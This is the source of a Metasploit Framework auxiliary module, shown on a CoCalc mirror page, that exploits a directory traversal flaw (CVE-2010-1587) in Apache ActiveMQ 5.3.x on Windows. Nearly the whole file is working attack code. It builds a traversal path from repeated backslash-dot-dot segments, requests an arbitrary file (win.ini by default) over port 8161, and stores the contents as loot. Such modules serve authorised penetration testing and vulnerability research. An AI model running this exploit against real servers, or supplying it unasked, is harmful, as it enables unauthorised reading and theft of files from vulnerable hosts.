Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_traversal.rb
32983 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Apache ActiveMQ Directory Traversal',

16
        'Description' => %q{

17
          This module exploits a directory traversal vulnerability in Apache ActiveMQ

18
          5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's

19
          ResourceHandler installed with the affected versions. This module has been tested

20
          successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'AbdulAziz Hariri', # Vulnerability discovery

25
          'juan vazquez' # Metasploit module

26
        ],

27
        'References' => [

28
          [ 'CVE', '2010-1587' ],

29
          [ 'OSVDB', '86401' ],

30
          [ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],

31
          [ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]

32
        ],

33
        'Notes' => {

34
          'Reliability' => UNKNOWN_RELIABILITY,

35
          'Stability' => UNKNOWN_STABILITY,

36
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        Opt::RPORT(8161),

44
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),

45
        OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])

46
      ]

47
    )

48
  end

49


50
  def run_host(ip)

51
    # No point to continue if no filename is specified

52
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?

53
      print_error("#{rhost}:#{rport} - Please supply FILEPATH")

54
      return

55
    end

56


57
    travs = "/\\.." * (datastore['DEPTH'] || 1)

58
    travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"

59
    travs << datastore['FILEPATH']

60


61
    print_status("#{rhost}:#{rport} - Sending request...")

62
    res = send_request_cgi({

63
      'uri' => travs,

64
      'method' => 'GET',

65
    })

66


67
    if res and res.code == 200

68
      contents = res.body

69
      fname = File.basename(datastore['FILEPATH'])

70
      path = store_loot(

71
        'apache.activemq',

72
        'application/octet-stream',

73
        ip,

74
        contents,

75
        fname

76
      )

77
      print_status("#{rhost}:#{rport} - File saved in: #{path}")

78
    else

79
      print_error("#{rhost}:#{rport} - Failed to retrieve file")

80
      return

81
    end

82
  end

83
end

84


85